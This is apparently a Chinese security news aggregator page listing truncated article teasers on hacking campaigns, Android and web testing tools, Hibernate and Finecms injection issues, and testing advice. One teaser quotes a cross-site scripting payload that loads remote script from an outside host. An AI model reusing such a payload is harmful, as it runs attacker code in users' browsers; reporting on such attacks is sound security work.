过去两年来,一个伊朗黑客团队入侵了16个国家的50多个机构的计算机和网络系统,包括航空公司、国防承包商、大学、军事设施、医院、机场、电信公司、政府机构,以及石油及天然气等能源企业。这些攻击被统称为“剁...
业界关注
业界关注
让你的HTML5&CSS3网站在微软的浏览器中也能运行
起初,IE其实也是一款非常有进取心的浏览器。但经过一段时间的蛰伏后,它已经成为了我们生活中的一道障碍。微软现在又重新开始向其它浏览器发起挑战,但事实情况是,新版的现代IE浏览器一直滞后于谷歌浏览器和火...
神兵利刃
Drozer – Android APP安全评估工具(附测试案例)
Drozer原名mercury,是一款不错的Android APP安全评估工具。现在有社区版/专业版两个版本。 具体的使用说明可以参考https://www.mwrinfosecurity.com/s...
解决plsql遇到乱码的问题
查看一些数据库服务器和客户端的额字符集有没有不同的:复制代码 代码如下:select * from nls_database_parameters;select * from nls_instance...
WooYun-Drops
Hibernate对注入的简单测试 – clzzy
http://drops.wooyun.org/tips/748 0x00 背景 前段时间遇到一个使用了Hibernate框架的站,以前没怎么接触过(由于是Java盲,所以大家勿喷),再注入的事情发生...
神兵利刃
[抛砖引玉]maltego调用nmap进行端口扫描
关于maltego的中文资料比较少,基本上涉及到的关键词都是“DNS,Email,Whois”。其实maltego的可扩展性还是比较强的,这里我就抛砖引玉的介绍下maltego的local trans...
WooYun-Zone
在贴吧被csrf了
点进来有..”,a:$.getScript(‘//xss.retaker.me/1.js’),a:” 题目都是这样的 本来以为是某个人测试的呢 ...
神兵利刃
智能家居协议数据包拦截工具-Z-Force
Z-Wave是一种新兴的基于射频的、低成本、低功耗、高可靠、适于网络的短距离无线通信技术,Z-Wave技术设计用于住宅、照明商业控制以及状态读取应用,例如抄表、照明及家电控制、HVAC、接入控制、防盗...
Seay信息安全博客
代码审计:Finecms 1.7.2注射漏洞及修复 |
显示不全请点击全屏阅读 漏洞文件:Client.Class.php29行处 public static function get_user_ip() { if(getenv(‘HT...
Seay信息安全博客
写给软件测试初学者 问题整理 |
显示不全请点击全屏阅读 1、刚刚接触软件测试时间不长,懂得基本的测试原理和测试流程,但是没有实际的测试经验。如果我现在想学习测试工具,应该从哪一个开始学习呢? 关于测试工具,现在主流的非主流的,行...
